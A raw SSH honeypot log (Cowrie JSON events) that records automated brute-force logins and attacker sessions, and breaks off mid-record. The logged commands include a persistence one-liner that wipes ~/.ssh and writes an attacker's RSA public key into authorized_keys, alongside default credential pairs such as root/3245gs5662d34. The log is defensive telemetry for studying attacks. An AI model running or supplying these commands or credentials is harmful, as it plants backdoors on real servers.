{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:19:54.784653Z","src_ip":"212.227.235.229","session":"70c6ffedd5b3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:19:56.028328Z","src_ip":"212.227.235.229","session":"70c6ffedd5b3"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:19:56.330364Z","src_ip":"212.227.235.229","session":"70c6ffedd5b3"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:19:56.334406Z","src_ip":"212.227.235.229","session":"f380c757a353"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56734,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7d171ec6207","protocol":"ssh","message":"New connection: 212.227.235.229:56734 (1.2.3.4:22) [session: f7d171ec6207]","sensor":"my-vps","timestamp":"2025-08-31T00:20:09.548725Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:20:10.727703Z","src_ip":"212.227.235.229","session":"f7d171ec6207"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:20:10.728478Z","src_ip":"212.227.235.229","session":"f7d171ec6207"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password1","message":"login attempt [admin/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T00:20:17.387808Z","src_ip":"212.227.235.229","session":"f7d171ec6207"}
{"eventid":"cowrie.session.closed","duration":"9.6","message":"Connection lost after 9.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:20:19.186759Z","src_ip":"212.227.235.229","session":"f7d171ec6207"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48570,"dst_ip":"1.2.3.4","dst_port":22,"session":"27a6d2d4a9a7","protocol":"ssh","message":"New connection: 212.227.125.160:48570 (1.2.3.4:22) [session: 27a6d2d4a9a7]","sensor":"my-vps","timestamp":"2025-08-31T00:20:31.291947Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:20:32.009187Z","src_ip":"212.227.125.160","session":"27a6d2d4a9a7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:20:32.011381Z","src_ip":"212.227.125.160","session":"27a6d2d4a9a7"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password1","message":"login attempt [admin/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T00:20:34.343287Z","src_ip":"212.227.125.160","session":"27a6d2d4a9a7"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:20:35.894545Z","src_ip":"212.227.125.160","session":"27a6d2d4a9a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34766,"dst_ip":"1.2.3.4","dst_port":22,"session":"164129a5f128","protocol":"ssh","message":"New connection: 212.227.235.229:34766 (1.2.3.4:22) [session: 164129a5f128]","sensor":"my-vps","timestamp":"2025-08-31T00:20:43.556390Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:20:43.557478Z","src_ip":"212.227.235.229","session":"164129a5f128"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:20:43.864429Z","src_ip":"212.227.235.229","session":"164129a5f128"}
{"eventid":"cowrie.login.success","username":"root","password":"root1","message":"login attempt [root/root1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:20:45.119081Z","src_ip":"212.227.235.229","session":"164129a5f128"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:20:45.744952Z","src_ip":"212.227.235.229","session":"164129a5f128"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:20:45.745783Z","src_ip":"212.227.235.229","session":"164129a5f128"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:20:45.746944Z","src_ip":"212.227.235.229","session":"164129a5f128"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:20:46.051723Z","src_ip":"212.227.235.229","session":"164129a5f128"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:20:47.120418Z","src_ip":"212.227.235.229","session":"164129a5f128"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T00:20:47.121080Z","src_ip":"212.227.235.229","session":"164129a5f128"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T00:20:47.425761Z","src_ip":"212.227.235.229","session":"164129a5f128"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:20:47.426701Z","src_ip":"212.227.235.229","session":"164129a5f128"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42816,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab2edad1a5a2","protocol":"ssh","message":"New connection: 212.227.235.229:42816 (1.2.3.4:22) [session: ab2edad1a5a2]","sensor":"my-vps","timestamp":"2025-08-31T00:20:47.731152Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:20:47.731991Z","src_ip":"212.227.235.229","session":"ab2edad1a5a2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:20:48.038722Z","src_ip":"212.227.235.229","session":"ab2edad1a5a2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T00:20:49.304096Z","src_ip":"212.227.235.229","session":"ab2edad1a5a2"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:20:50.612992Z","src_ip":"212.227.235.229","session":"ab2edad1a5a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46930,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6b3a0867fac","protocol":"ssh","message":"New connection: 212.227.235.229:46930 (1.2.3.4:22) [session: d6b3a0867fac]","sensor":"my-vps","timestamp":"2025-08-31T00:20:50.919002Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:20:50.919887Z","src_ip":"212.227.235.229","session":"d6b3a0867fac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:20:51.226824Z","src_ip":"212.227.235.229","session":"d6b3a0867fac"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:20:52.495692Z","src_ip":"212.227.235.229","session":"d6b3a0867fac"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:20:52.802825Z","src_ip":"212.227.235.229","session":"164129a5f128"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:20:52.804033Z","src_ip":"212.227.235.229","session":"d6b3a0867fac"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53114,"dst_ip":"1.2.3.4","dst_port":22,"session":"de5529121696","protocol":"ssh","message":"New connection: 217.72.205.35:53114 (1.2.3.4:22) [session: de5529121696]","sensor":"my-vps","timestamp":"2025-08-31T00:21:04.666885Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:21:04.668216Z","src_ip":"217.72.205.35","session":"de5529121696"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43118,"dst_ip":"1.2.3.4","dst_port":22,"session":"60d9809d5d92","protocol":"ssh","message":"New connection: 212.227.235.229:43118 (1.2.3.4:22) [session: 60d9809d5d92]","sensor":"my-vps","timestamp":"2025-08-31T00:21:12.524180Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:21:13.502142Z","src_ip":"212.227.235.229","session":"60d9809d5d92"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:21:13.502911Z","src_ip":"212.227.235.229","session":"60d9809d5d92"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:21:22.629380Z","src_ip":"212.227.235.229","session":"60d9809d5d92"}
{"eventid":"cowrie.session.closed","duration":"11.9","message":"Connection lost after 11.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:21:24.465431Z","src_ip":"212.227.235.229","session":"60d9809d5d92"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34562,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a3ef2360707","protocol":"ssh","message":"New connection: 212.227.125.160:34562 (1.2.3.4:22) [session: 6a3ef2360707]","sensor":"my-vps","timestamp":"2025-08-31T00:21:34.455167Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:21:34.693003Z","src_ip":"212.227.125.160","session":"6a3ef2360707"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:21:34.693636Z","src_ip":"212.227.125.160","session":"6a3ef2360707"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:21:36.341898Z","src_ip":"212.227.125.160","session":"6a3ef2360707"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:21:37.899435Z","src_ip":"212.227.125.160","session":"6a3ef2360707"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41530,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf9cd3db6549","protocol":"ssh","message":"New connection: 212.227.235.229:41530 (1.2.3.4:22) [session: cf9cd3db6549]","sensor":"my-vps","timestamp":"2025-08-31T00:21:41.134062Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:21:41.135001Z","src_ip":"212.227.235.229","session":"cf9cd3db6549"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha